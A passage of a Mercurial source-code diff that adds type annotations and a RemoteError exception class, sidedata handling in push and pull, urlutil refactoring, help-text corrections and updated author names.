pycompat.sysstr(self.__bytes__()) def format(self): + # type: () -> bytes from .i18n import _ message = _(b"abort: %s\n") % self.message @@ -246,10 +259,12 @@ """Exception raised when parsing config files""" def __init__(self, message, location=None, hint=None): + # type: (bytes, Optional[bytes], Optional[bytes]) -> None super(ConfigError, self).__init__(message, hint=hint) self.location = location def format(self): + # type: () -> bytes from .i18n import _ if self.location is not None: @@ -289,20 +304,34 @@ Abort.__init__(self, _(b'response expected')) -class OutOfBandError(Hint, Exception): +class RemoteError(Abort): + """Exception raised when interacting with a remote repo fails""" + + +class OutOfBandError(RemoteError): """Exception raised when a remote repo reports failure""" - __bytes__ = _tobytes + def __init__(self, message=None, hint=None): + from .i18n import _ + + if message: + # Abort.format() adds a trailing newline + message = _(b"remote error:\n%s") % message.rstrip(b'\n') + else: + message = _(b"remote error") + super(OutOfBandError, self).__init__(message, hint=hint) class ParseError(Abort): """Raised when parsing config files and {rev,file}sets (msg[, pos])""" def __init__(self, message, location=None, hint=None): + # type: (bytes, Optional[Union[bytes, int]], Optional[bytes]) -> None super(ParseError, self).__init__(message, hint=hint) self.location = location def format(self): + # type: () -> bytes from .i18n import _ if self.location is not None: @@ -322,6 +351,7 @@ def getsimilar(symbols, value): + # type: (Iterable[bytes], bytes) -> List[bytes] sim = lambda x: difflib.SequenceMatcher(None, value, x).ratio() # The cutoff for similarity here is pretty arbitrary. It should # probably be investigated and tweaked. 
@@ -329,6 +359,7 @@ def similarity_hint(similar): + # type: (List[bytes]) -> Optional[bytes] from .i18n import _ if len(similar) == 1: @@ -344,6 +375,7 @@ """Exception raised when a {rev,file}set references an unknown identifier""" def __init__(self, function, symbols): + # type: (bytes, Iterable[bytes]) -> None from .i18n import _ similar = getsimilar(symbols, function) @@ -378,6 +410,7 @@ """Raised if I/O to stdout or stderr fails""" def __init__(self, err): + # type: (IOError) -> None IOError.__init__(self, err.errno, err.strerror) # no __bytes__() because error message is derived from the standard IOError @@ -385,6 +418,7 @@ class UnsupportedMergeRecords(Abort): def __init__(self, recordtypes): + # type: (Iterable[bytes]) -> None from .i18n import _ self.recordtypes = sorted(recordtypes) @@ -403,12 +437,15 @@ """generic exception for aborting from an encounter with an unknown version""" def __init__(self, msg, hint=None, version=None): + # type: (bytes, Optional[bytes], Optional[bytes]) -> None self.version = version super(UnknownVersion, self).__init__(msg, hint=hint) class LockError(IOError): def __init__(self, errno, strerror, filename, desc): + # TODO: figure out if this should be bytes or str + # _type: (int, str, str, bytes) -> None IOError.__init__(self, errno, strerror, filename) self.desc = desc @@ -455,6 +492,7 @@ """Raised if a mercurial (core or extension) developer made a mistake""" def __init__(self, msg, *args, **kwargs): + # type: (AnyStr, Any, Any) -> None # On Python 3, turn the message back into a string since this is # an internal-only error that won't be printed except in a # stack traces. @@ -498,7 +536,7 @@ entries.append(b"%s=%r" % (par, pycompat.maybebytestr(val))) if entries: msg = b'%s - %s' % (msg, b', '.join(entries)) - ValueError.__init__(self, msg) + ValueError.__init__(self, msg) # TODO: convert to str? 
class ReadOnlyPartError(RuntimeError): @@ -532,6 +570,7 @@ """ def __init__(self, filename, node, tombstone): + # type: (bytes, bytes, bytes) -> None from .node import short StorageError.__init__(self, b'%s:%s' % (filename, short(node))) @@ -587,5 +626,6 @@ """ def __init__(self, message, args=None): + # type: (bytes, Optional[Sequence[bytes]]) -> None self.message = message self.messageargs = args diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -1,6 +1,6 @@ # exchange.py - utility to exchange data between repos. # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -42,6 +42,7 @@ from .utils import ( hashutil, stringutil, + urlutil, ) urlerr = util.urlerr @@ -420,7 +421,20 @@ b'unbundle wire protocol command' ) ) - + for category in sorted(bundle2.read_remote_wanted_sidedata(pushop.remote)): + # Check that a computer is registered for that category for at least + # one revlog kind. 
+ for kind, computers in repo._sidedata_computers.items(): + if computers.get(category): + break + else: + raise error.Abort( + _( + b'cannot push: required sidedata category not supported' + b" by this client: '%s'" + ) + % pycompat.bytestr(category) + ) # get lock as we might write phase data wlock = lock = None try: @@ -814,7 +828,7 @@ data = [] for book, old, new in pushop.outbookmarks: data.append((book, old)) - checkdata = bookmod.binaryencode(data) + checkdata = bookmod.binaryencode(pushop.repo, data) bundler.newpart(b'check:bookmarks', data=checkdata) @@ -865,8 +879,15 @@ if not cgversions: raise error.Abort(_(b'no common changegroup version')) version = max(cgversions) + + remote_sidedata = bundle2.read_remote_wanted_sidedata(pushop.remote) cgstream = changegroup.makestream( - pushop.repo, pushop.outgoing, version, b'push' + pushop.repo, + pushop.outgoing, + version, + b'push', + bundlecaps=b2caps, + remote_sidedata=remote_sidedata, ) cgpart = bundler.newpart(b'changegroup', data=cgstream) if cgversions: @@ -1007,7 +1028,7 @@ _abortonsecretctx(pushop, new, book) data.append((book, new)) allactions.append((book, _bmaction(old, new))) - checkdata = bookmod.binaryencode(data) + checkdata = bookmod.binaryencode(pushop.repo, data) bundler.newpart(b'bookmarks', data=checkdata) def handlereply(op): @@ -1126,19 +1147,19 @@ }, ).result() except error.BundleValueError as exc: - raise error.Abort(_(b'missing support for %s') % exc) + raise error.RemoteError(_(b'missing support for %s') % exc) try: trgetter = None if pushback: trgetter = pushop.trmanager.transaction op = bundle2.processbundle(pushop.repo, reply, trgetter) except error.BundleValueError as exc: - raise error.Abort(_(b'missing support for %s') % exc) + raise error.RemoteError(_(b'missing support for %s') % exc) except bundle2.AbortFromPart as exc: - pushop.ui.status(_(b'remote: %s\n') % exc) + pushop.ui.error(_(b'remote: %s\n') % exc) if exc.hint is not None: - pushop.ui.status(_(b'remote: %s\n') % 
(b'(%s)' % exc.hint)) - raise error.Abort(_(b'push failed on remote')) + pushop.ui.error(_(b'remote: %s\n') % (b'(%s)' % exc.hint)) + raise error.RemoteError(_(b'push failed on remote')) except error.PushkeyFailed as exc: partid = int(exc.partid) if partid not in pushop.pkfailcb: @@ -1445,7 +1466,7 @@ def transaction(self): """Return an open transaction object, constructing if necessary""" if not self._tr: - trname = b'%s\n%s' % (self.source, util.hidepassword(self.url)) + trname = b'%s\n%s' % (self.source, urlutil.hidepassword(self.url)) self._tr = self.repo.transaction(trname) self._tr.hookargs[b'source'] = self.source self._tr.hookargs[b'url'] = self.url @@ -1607,6 +1628,23 @@ ) % (b', '.join(sorted(missing))) raise error.Abort(msg) + for category in repo._wanted_sidedata: + # Check that a computer is registered for that category for at least + # one revlog kind. + for kind, computers in repo._sidedata_computers.items(): + if computers.get(category): + break + else: + # This should never happen since repos are supposed to be able to + # generate the sidedata they require. 
+ raise error.ProgrammingError( + _( + b'sidedata category requested by local side without local' + b"support: '%s'" + ) + % pycompat.bytestr(category) + ) + pullop.trmanager = transactionmanager(repo, b'pull', remote.url()) wlock = util.nullcontextmanager() if not bookmod.bookmarksinstore(repo): @@ -1820,6 +1858,10 @@ pullop.stepsdone.add(b'obsmarkers') _pullbundle2extraprepare(pullop, kwargs) + remote_sidedata = bundle2.read_remote_wanted_sidedata(pullop.remote) + if remote_sidedata: + kwargs[b'remote_sidedata'] = remote_sidedata + with pullop.remote.commandexecutor() as e: args = dict(kwargs) args[b'source'] = b'pull' @@ -1832,10 +1874,10 @@ op.modes[b'bookmarks'] = b'records' bundle2.processbundle(pullop.repo, bundle, op=op) except bundle2.AbortFromPart as exc: - pullop.repo.ui.status(_(b'remote: abort: %s\n') % exc) - raise error.Abort(_(b'pull failed on remote'), hint=exc.hint) + pullop.repo.ui.error(_(b'remote: abort: %s\n') % exc) + raise error.RemoteError(_(b'pull failed on remote'), hint=exc.hint) except error.BundleValueError as exc: - raise error.Abort(_(b'missing support for %s') % exc) + raise error.RemoteError(_(b'missing support for %s') % exc) if pullop.fetch: pullop.cgresult = bundle2.combinechangegroupresults(op) @@ -2249,7 +2291,13 @@ def getbundlechunks( - repo, source, heads=None, common=None, bundlecaps=None, **kwargs + repo, + source, + heads=None, + common=None, + bundlecaps=None, + remote_sidedata=None, + **kwargs ): """Return chunks constituting a bundle's raw data. 
@@ -2279,7 +2327,12 @@ return ( info, changegroup.makestream( - repo, outgoing, b'01', source, bundlecaps=bundlecaps + repo, + outgoing, + b'01', + source, + bundlecaps=bundlecaps, + remote_sidedata=remote_sidedata, ), ) @@ -2303,6 +2356,7 @@ source, bundlecaps=bundlecaps, b2caps=b2caps, + remote_sidedata=remote_sidedata, **pycompat.strkwargs(kwargs) ) @@ -2325,6 +2379,7 @@ b2caps=None, heads=None, common=None, + remote_sidedata=None, **kwargs ): """add a changegroup part to the requested bundle""" @@ -2355,7 +2410,13 @@ matcher = None cgstream = changegroup.makestream( - repo, outgoing, version, source, bundlecaps=bundlecaps, matcher=matcher + repo, + outgoing, + version, + source, + bundlecaps=bundlecaps, + matcher=matcher, + remote_sidedata=remote_sidedata, ) part = bundler.newpart(b'changegroup', data=cgstream) @@ -2369,6 +2430,8 @@ if b'exp-sidedata-flag' in repo.requirements: part.addparam(b'exp-sidedata', b'1') + sidedata = bundle2.format_remote_wanted_sidedata(repo) + part.addparam(b'exp-wanted-sidedata', sidedata) if ( kwargs.get('narrow', False) @@ -2393,7 +2456,7 @@ if not b2caps or b'bookmarks' not in b2caps: raise error.Abort(_(b'no common bookmarks exchange method')) books = bookmod.listbinbookmarks(repo) - data = bookmod.binaryencode(books) + data = bookmod.binaryencode(repo, books) if data: bundler.newpart(b'bookmarks', data=data) @@ -2585,7 +2648,7 @@ # push can proceed if not isinstance(cg, bundle2.unbundle20): # legacy case: bundle1 (changegroup 01) - txnname = b"\n".join([source, util.hidepassword(url)]) + txnname = b"\n".join([source, urlutil.hidepassword(url)]) with repo.lock(), repo.transaction(txnname) as tr: op = bundle2.applybundle(repo, cg, tr, source, url) r = bundle2.combinechangegroupresults(op) diff --git a/mercurial/exchangev2.py b/mercurial/exchangev2.py --- a/mercurial/exchangev2.py +++ b/mercurial/exchangev2.py @@ -22,6 +22,7 @@ narrowspec, phases, pycompat, + requirements as requirementsmod, setdiscovery, ) from .interfaces 
import repository @@ -183,7 +184,7 @@ # TODO This is super hacky. There needs to be a storage API for this. We # also need to check for compatibility with the remote. - if b'revlogv1' not in repo.requirements: + if requirementsmod.REVLOGV1_REQUIREMENT not in repo.requirements: return False return True @@ -358,18 +359,20 @@ # Linkrev for changelog is always self. return len(cl) - def ondupchangeset(cl, node): - added.append(node) + def ondupchangeset(cl, rev): + added.append(cl.node(rev)) - def onchangeset(cl, node): + def onchangeset(cl, rev): progress.increment() - revision = cl.changelogrevision(node) - added.append(node) + revision = cl.changelogrevision(rev) + added.append(cl.node(rev)) # We need to preserve the mapping of changelog revision to node # so we can set the linkrev accordingly when manifests are added. - manifestnodes[cl.rev(node)] = revision.manifest + manifestnodes[rev] = revision.manifest + + repo.register_changeset(rev, revision) nodesbyphase = {phase: set() for phase in phases.phasenames.values()} remotebookmarks = {} @@ -414,12 +417,15 @@ mdiff.trivialdiffheader(len(data)) + data, # Flags not yet supported. 0, + # Sidedata not yet supported + {}, ) cl.addgroup( iterrevisions(), linkrev, weakref.proxy(tr), + alwayscache=True, addrevisioncb=onchangeset, duplicaterevisioncb=ondupchangeset, ) @@ -492,6 +498,8 @@ delta, # Flags not yet supported. 0, + # Sidedata not yet supported. + {}, ) progress.increment() @@ -533,8 +541,8 @@ # Chomp off header object. next(objs) - def onchangeset(cl, node): - added.append(node) + def onchangeset(cl, rev): + added.append(cl.node(rev)) rootmanifest.addgroup( iterrevisions(objs, progress), @@ -617,6 +625,8 @@ delta, # Flags not yet supported. 0, + # Sidedata not yet supported. + {}, ) progress.increment() @@ -715,6 +725,8 @@ delta, # Flags not yet supported. 0, + # Sidedata not yet supported. 
+ {}, ) progress.increment() diff --git a/mercurial/extensions.py b/mercurial/extensions.py --- a/mercurial/extensions.py +++ b/mercurial/extensions.py @@ -1,6 +1,6 @@ # extensions.py - extension handling for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/exthelper.py b/mercurial/exthelper.py --- a/mercurial/exthelper.py +++ b/mercurial/exthelper.py @@ -46,13 +46,22 @@ # ext.py eh = exthelper.exthelper() - # As needed: + # As needed (failure to do this will mean your registration will not + # happen): cmdtable = eh.cmdtable configtable = eh.configtable filesetpredicate = eh.filesetpredicate revsetpredicate = eh.revsetpredicate templatekeyword = eh.templatekeyword + # As needed (failure to do this will mean your eh.wrap*-decorated + # functions will not wrap, and/or your eh.*setup-decorated functions + # will not execute): + uisetup = eh.finaluisetup + extsetup = eh.finalextsetup + reposetup = eh.finalreposetup + uipopulate = eh.finaluipopulate + @eh.command(b'mynewcommand', [(b'r', b'rev', [], _(b'operate on these revisions'))], _(b'-r REV...'), @@ -155,7 +164,7 @@ c(ui) def finalextsetup(self, ui): - """Method to be used as a the extension extsetup + """Method to be used as the extension extsetup The following operations belong here: @@ -201,6 +210,9 @@ example:: + # Required, otherwise your uisetup function(s) will not execute. + uisetup = eh.finaluisetup + @eh.uisetup def setupbabar(ui): print('this is uisetup!') @@ -213,6 +225,9 @@ example:: + # Required, otherwise your uipopulate function(s) will not execute. + uipopulate = eh.finaluipopulate + @eh.uipopulate def setupfoo(ui): print('this is uipopulate!') @@ -225,6 +240,9 @@ example:: + # Required, otherwise your extsetup function(s) will not execute. 
+ extsetup = eh.finalextsetup + @eh.extsetup def setupcelestine(ui): print('this is extsetup!') @@ -237,6 +255,9 @@ example:: + # Required, otherwise your reposetup function(s) will not execute. + reposetup = eh.finalreposetup + @eh.reposetup def setupzephir(ui, repo): print('this is reposetup!') @@ -258,6 +279,11 @@ example:: + # Required if `extension` is not provided + uisetup = eh.finaluisetup + # Required if `extension` is provided + extsetup = eh.finalextsetup + @eh.wrapcommand(b'summary') def wrapsummary(orig, ui, repo, *args, **kwargs): ui.note(b'Barry!') @@ -298,8 +324,11 @@ example:: - @eh.function(discovery, b'checkheads') - def wrapfunction(orig, *args, **kwargs): + # Required, otherwise the function will not be wrapped + uisetup = eh.finaluisetup + + @eh.wrapfunction(discovery, b'checkheads') + def wrapcheckheads(orig, *args, **kwargs): ui.note(b'His head smashed in and his heart cut out') return orig(*args, **kwargs) """ diff --git a/mercurial/fancyopts.py b/mercurial/fancyopts.py --- a/mercurial/fancyopts.py +++ b/mercurial/fancyopts.py @@ -1,6 +1,6 @@ # fancyopts.py - better command line parsing # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/filelog.py b/mercurial/filelog.py --- a/mercurial/filelog.py +++ b/mercurial/filelog.py @@ -1,6 +1,6 @@ # filelog.py - file history class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -32,6 +32,8 @@ # Full name of the user visible file, relative to the repository root. # Used by LFS. 
self._revlog.filename = path + self._revlog.revlog_kind = b'filelog' + self.nullid = self._revlog.nullid def __len__(self): return len(self._revlog) @@ -102,6 +104,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): return self._revlog.emitrevisions( nodes, @@ -109,6 +112,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ) def addrevision( @@ -176,7 +180,8 @@ def add(self, text, meta, transaction, link, p1=None, p2=None): if meta or text.startswith(b'\1\n'): text = storageutil.packmeta(meta, text) - return self.addrevision(text, transaction, link, p1, p2) + rev = self.addrevision(text, transaction, link, p1, p2) + return self.node(rev) def renamed(self, node): return storageutil.filerevisioncopied(self, node) diff --git a/mercurial/filemerge.py b/mercurial/filemerge.py --- a/mercurial/filemerge.py +++ b/mercurial/filemerge.py @@ -1,6 +1,6 @@ # filemerge.py - file-level merge handling for Mercurial # -# Copyright 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -538,6 +538,25 @@ @internaltool( + b'merge3-lie-about-conflicts', + fullmerge, + b'', + precheck=_mergecheck, +) +def _imerge3alwaysgood(*args, **kwargs): + # Like merge3, but record conflicts as resolved with markers in place. + # + # This is used for `diff.merge` to show the differences between + # the auto-merge state and the committed merge state. It may be + # useful for other things. + b1, junk, b2 = _imerge3(*args, **kwargs) + # TODO is this right? I'm not sure what these return values mean, + # but as far as I can tell this will indicate to callers that the
+ return b1, False, b2 + + +@internaltool( b'mergediff', fullmerge, _( @@ -1195,7 +1214,11 @@ def hasconflictmarkers(data): return bool( - re.search(b"^(<<<<<<< .*|=======|>>>>>>> .*)$", data, re.MULTILINE) + re.search( + br"^(<<<<<<<.*|=======.*|------- .*|\+\+\+\+\+\+\+ .*|>>>>>>>.*)$", + data, + re.MULTILINE, + ) ) diff --git a/mercurial/fileset.py b/mercurial/fileset.py --- a/mercurial/fileset.py +++ b/mercurial/fileset.py @@ -1,6 +1,6 @@ # fileset.py - file set queries for mercurial # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/filesetlang.py b/mercurial/filesetlang.py --- a/mercurial/filesetlang.py +++ b/mercurial/filesetlang.py @@ -1,6 +1,6 @@ # filesetlang.py - parser, tokenizer and utility for file set language # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/formatter.py b/mercurial/formatter.py --- a/mercurial/formatter.py +++ b/mercurial/formatter.py @@ -1,6 +1,6 @@ # formatter.py - generic output formatting for mercurial # -# Copyright 2012 Matt Mackall <mpm@selenic.com> +# Copyright 2012 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -178,6 +178,11 @@ class baseformatter(object): + + # set to True if the formater output a strict format that does not support + # arbitrary output in the stream. 
+ strict_format = False + def __init__(self, ui, topic, opts, converter): self._ui = ui self._topic = topic @@ -418,6 +423,9 @@ class jsonformatter(baseformatter): + + strict_format = True + def __init__(self, ui, out, topic, opts): baseformatter.__init__(self, ui, topic, opts, _nullconverter) self._out = out diff --git a/mercurial/grep.py b/mercurial/grep.py --- a/mercurial/grep.py +++ b/mercurial/grep.py @@ -1,6 +1,6 @@ # grep.py - logic for history walk and grep # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hbisect.py b/mercurial/hbisect.py --- a/mercurial/hbisect.py +++ b/mercurial/hbisect.py @@ -1,6 +1,6 @@ # changelog bisection for mercurial # -# Copyright 2007 Matt Mackall +# Copyright 2007 Olivia Mackall # Copyright 2005, 2006 Benoit Boissinot <benoit.boissinot@ens-lyon.org> # # Inspired by git bisect, extension skeleton taken from mq.py. diff --git a/mercurial/help.py b/mercurial/help.py --- a/mercurial/help.py +++ b/mercurial/help.py @@ -1,6 +1,6 @@ # help.py - help data for mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -829,10 +829,11 @@ def appendcmds(cmds): cmds = sorted(cmds) for c in cmds: + display_cmd = c if ui.verbose: - rst.append(b" :%s: %s\n" % (b', '.join(syns[c]), h[c])) - else: - rst.append(b' :%s: %s\n' % (c, h[c])) + display_cmd = b', '.join(syns[c]) + display_cmd = display_cmd.replace(b':', br'\:') + rst.append(b' :%s: %s\n' % (display_cmd, h[c])) if name in (b'shortlist', b'debug'): # List without categories. 
diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -910,7 +910,8 @@ Repository with this on-disk format require Mercurial version 5.4 or above. - Disabled by default. + By default this format variant is disabled if fast implementation is not + available and enabled by default if the fast implementation is available. ``use-share-safe`` Enforce "safe" behaviors for all "shares" that access this repository. @@ -966,7 +967,7 @@ On some systems, the Mercurial installation may lack `zstd` support. - Default is `zlib`. + Default is `zstd` if available, `zlib` otherwise. ``bookmarks-in-store`` Store bookmarks in .hg/store/. This means that bookmarks are shared when @@ -1150,7 +1151,7 @@ ``pretxnopen`` Run before any new repository transaction is open. The reason for the transaction will be in ``$HG_TXNNAME``, and a unique identifier for the - transaction will be in ``HG_TXNID``. A non-zero status will prevent the + transaction will be in ``$HG_TXNID``. A non-zero status will prevent the transaction from being opened. ``pretxnclose`` @@ -1159,12 +1160,13 @@ content or change it. Exit status 0 allows the commit to proceed. A non-zero status will cause the transaction to be rolled back. The reason for the transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for - the transaction will be in ``HG_TXNID``. The rest of the available data will - vary according the transaction type. New changesets will add ``$HG_NODE`` - (the ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last - added changeset), ``$HG_URL`` and ``$HG_SOURCE`` variables. Bookmark and - phase changes will set ``HG_BOOKMARK_MOVED`` and ``HG_PHASES_MOVED`` to ``1`` - respectively, etc. + the transaction will be in ``$HG_TXNID``. The rest of the available data will + vary according to the transaction type. Changes unbundled to the repository will + add ``$HG_URL`` and ``$HG_SOURCE``.
New changesets will add ``$HG_NODE`` (the + ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last added + changeset). Bookmark and phase changes will set ``$HG_BOOKMARK_MOVED`` and + ``$HG_PHASES_MOVED`` to ``1`` respectively. The number of new obsmarkers, if + any, will be in ``$HG_NEW_OBSMARKERS``, etc. ``pretxnclose-bookmark`` Run right before a bookmark change is actually finalized. Any repository @@ -1178,7 +1180,7 @@ will be empty. In addition, the reason for the transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for the transaction will be in - ``HG_TXNID``. + ``$HG_TXNID``. ``pretxnclose-phase`` Run right before a phase change is actually finalized. Any repository change @@ -1190,7 +1192,7 @@ while the previous ``$HG_OLDPHASE``. In case of new node, ``$HG_OLDPHASE`` will be empty. In addition, the reason for the transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for the transaction will be in - ``HG_TXNID``. The hook is also run for newly added revisions. In this case + ``$HG_TXNID``. The hook is also run for newly added revisions. In this case the ``$HG_OLDPHASE`` entry will be empty. ``txnclose`` @@ -1701,7 +1703,8 @@ These symbolic names can be used from the command line. To pull from ``my_server``: :hg:`pull my_server`. To push to ``local_path``: -:hg:`push local_path`. +:hg:`push local_path`. You can check :hg:`help urls` for details about +valid URLs. Options containing colons (``:``) denote sub-options that can influence behavior for that specific path. Example:: @@ -1710,6 +1713,9 @@ my_server = https://example.com/my_path my_server:pushurl = ssh://example.com/my_path +Paths using the `path://otherpath` scheme will inherit the sub-options value from +the path they point to. 
+ The following sub-options can be defined: ``pushurl`` diff --git a/mercurial/helptext/hg-ssh.8.txt b/mercurial/helptext/hg-ssh.8.txt --- a/mercurial/helptext/hg-ssh.8.txt +++ b/mercurial/helptext/hg-ssh.8.txt @@ -52,7 +52,7 @@ Author """""" -Written by Matt Mackall <mpm@selenic.com> +Written by Olivia Mackall <olivia@selenic.com> Resources """"""""" @@ -64,7 +64,7 @@ Copying """"""" -Copyright (C) 2005-2016 Matt Mackall. +Copyright (C) 2005-2016 Olivia Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hg.1.txt b/mercurial/helptext/hg.1.txt --- a/mercurial/helptext/hg.1.txt +++ b/mercurial/helptext/hg.1.txt @@ -6,7 +6,7 @@ Mercurial source code management system --------------------------------------- -:Author: Matt Mackall <mpm@selenic.com> +:Author: Olivia Mackall <olivia@selenic.com> :Organization: Mercurial :Manual section: 1 :Manual group: Mercurial Manual @@ -100,7 +100,7 @@ Author """""" -Written by Matt Mackall <mpm@selenic.com> +Written by Olivia Mackall <olivia@selenic.com> Resources """"""""" @@ -112,7 +112,7 @@ Copying """"""" -Copyright (C) 2005-2021 Matt Mackall. +Copyright (C) 2005-2021 Olivia Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hgignore.5.txt b/mercurial/helptext/hgignore.5.txt --- a/mercurial/helptext/hgignore.5.txt +++ b/mercurial/helptext/hgignore.5.txt @@ -17,7 +17,7 @@ ====== Vadim Gelfer <vadim.gelfer@gmail.com> -Mercurial was written by Matt Mackall <mpm@selenic.com>. +Mercurial was written by Olivia Mackall <olivia@selenic.com>. See Also ======== @@ -26,7 +26,7 @@ Copying ======= This manual page is copyright 2006 Vadim Gelfer. -Mercurial is copyright 2005-2021 Matt Mackall. +Mercurial is copyright 2005-2021 Olivia Mackall. 
Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hgrc.5.txt b/mercurial/helptext/hgrc.5.txt --- a/mercurial/helptext/hgrc.5.txt +++ b/mercurial/helptext/hgrc.5.txt @@ -25,7 +25,7 @@ ====== Bryan O'Sullivan <bos@serpentine.com>. -Mercurial was written by Matt Mackall <mpm@selenic.com>. +Mercurial was written by Olivia Mackall <olivia@selenic.com>. See Also ======== @@ -34,7 +34,7 @@ Copying ======= This manual page is copyright 2005 Bryan O'Sullivan. -Mercurial is copyright 2005-2021 Matt Mackall. +Mercurial is copyright 2005-2021 Olivia Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/urls.txt b/mercurial/helptext/urls.txt --- a/mercurial/helptext/urls.txt +++ b/mercurial/helptext/urls.txt @@ -5,6 +5,7 @@ http://[user[:pass]@]host[:port]/[path][#revision] https://[user[:pass]@]host[:port]/[path][#revision] ssh://[user@]host[:port]/[path][#revision] + path://pathname Paths in the local filesystem can either point to Mercurial repositories or to bundle files (as created by :hg:`bundle` or @@ -64,3 +65,12 @@ default-push: The push command will look for a path named 'default-push', and prefer it over 'default' if both are defined. + +These aliases can also be used in the `path://` scheme:: + + [paths] + alias1 = URL1 + alias2 = path://alias1 + ... + +Check :hg:`help config.paths` for details about the behavior of such "sub-paths".
diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1,6 +1,6 @@ # hg.py - repository classes for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the @@ -32,6 +32,7 @@ error, exchange, extensions, + graphmod, httppeer, localrepo, lock, @@ -55,6 +56,7 @@ from .utils import ( hashutil, stringutil, + urlutil, ) @@ -65,7 +67,7 @@ def _local(path): - path = util.expandpath(util.urllocalpath(path)) + path = util.expandpath(urlutil.urllocalpath(path)) try: # we use os.stat() directly here instead of os.path.isfile() @@ -131,13 +133,9 @@ def parseurl(path, branches=None): '''parse url#branch, returning (url, (branch, branches))''' - - u = util.url(path) - branch = None - if u.fragment: - branch = u.fragment - u.fragment = None - return bytes(u), (branch, branches or []) + msg = b'parseurl(...) 
moved to mercurial.utils.urlutil' + util.nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.parseurl(path, branches=branches) schemes = { @@ -152,7 +150,7 @@ def _peerlookup(path): - u = util.url(path) + u = urlutil.url(path) scheme = u.scheme or b'file' thing = schemes.get(scheme) or schemes[b'file'] try: @@ -177,7 +175,7 @@ def openpath(ui, path, sendaccept=True): '''open path with open if local, url.open if remote''' - pathurl = util.url(path, parsequery=False, parsefragment=False) + pathurl = urlutil.url(path, parsequery=False, parsefragment=False) if pathurl.islocal(): return util.posixfile(pathurl.localpath(), b'rb') else: @@ -265,7 +263,7 @@ >>> defaultdest(b'http://example.org/foo/') 'foo' """ - path = util.url(source).path + path = urlutil.url(source).path if not path: return b'' return os.path.basename(os.path.normpath(path)) @@ -284,7 +282,7 @@ # the sharedpath always ends in the .hg; we want the path to the repo source = repo.vfs.split(repo.sharedpath)[0] - srcurl, branches = parseurl(source) + srcurl, branches = urlutil.parseurl(source) srcrepo = repository(repo.ui, srcurl) repo.srcrepo = srcrepo return srcrepo @@ -307,11 +305,10 @@ if not dest: dest = defaultdest(source) else: - dest = ui.expandpath(dest) + dest = urlutil.get_clone_path(ui, dest)[1] if isinstance(source, bytes): - origsource = ui.expandpath(source) - source, branches = parseurl(origsource) + origsource, source, branches = urlutil.get_clone_path(ui, source) srcrepo = repository(ui, source) rev, checkout = addbranchrevs(srcrepo, srcrepo, branches, None) else: @@ -571,7 +568,7 @@ # Resolve the value to put in [paths] section for the source. 
